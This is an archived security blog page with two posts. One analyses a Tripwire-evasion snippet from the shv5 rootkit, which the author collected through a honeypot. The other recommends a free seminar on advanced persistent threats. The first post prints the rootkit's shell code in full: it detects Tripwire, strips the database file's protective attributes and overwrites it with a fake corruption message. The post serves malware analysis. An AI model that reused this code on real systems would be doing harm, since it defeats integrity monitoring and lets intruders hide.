This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.
Showing posts with label APT. Show all posts
Showing posts with label APT. Show all posts

Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats

Reviewing some of the malware setup scripts I've collected through my honeypot, the following code really caught my attention.  This code is from the shv5 rootkit, which was released in 2010, and is detected by most antivirus scanners.

echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"

uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"

if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd
echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
echo "${RED} ALERT! tripwire database found ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
echo "-----------------------------------------" > $twd
echo "Tripwire segment-faulted !" >> $twd
echo "-----------------------------------------" >> $twd
echo "" >> $twd
echo "The reasons for this may be: " >> $twd
echo "" >> $twd
echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
echo "corrupted files while checking for possible change etc." >> $twd
echo ""
echo "pls. rerun tripwire to build the database again!" >> $twd
echo "" >> $twd
else
echo "${WHI} lucky you: Tripwire database not found. ${RES}"
fi
else
echo "${WHI} guess not. ${RES}"
fi

Read more »
Posted by on No comments:
Ingredients: , , ,

Hacker's Breakfast - Absolutely Great Learning Experience

Today I had the privilege of attending a free training seminar today put on by TrainACE called "The Hacker's Breakfast".  The topic of the day was advanced persistent threats and one of my favorite topics - honeypots.

Not only did I get a free breakfast, but I learned a lot from Alex Lanstein of FireEye and Timber Wolfe of Neustar, Inc.

If you haven't attended one of these yet - I would strongly encourage you to do so.  TrainACE provides the training completely free of charge - and you'll get to learn about some of the other training opportunities which are coming up.

This wasn't your typical "free advertisement disguised as a seminar".  In fact the training provided was extremely informative and useful - and there wasn't any pressure to buy anything or sign up for any future training classes.

I'd like to give a big shout out to Megan Horner for inviting me to the event.  Megan recently submitted a guest blog post which you can view here.


Posted by on No comments:
Ingredients: , , , , ,
Subscribe to: Comments (Atom)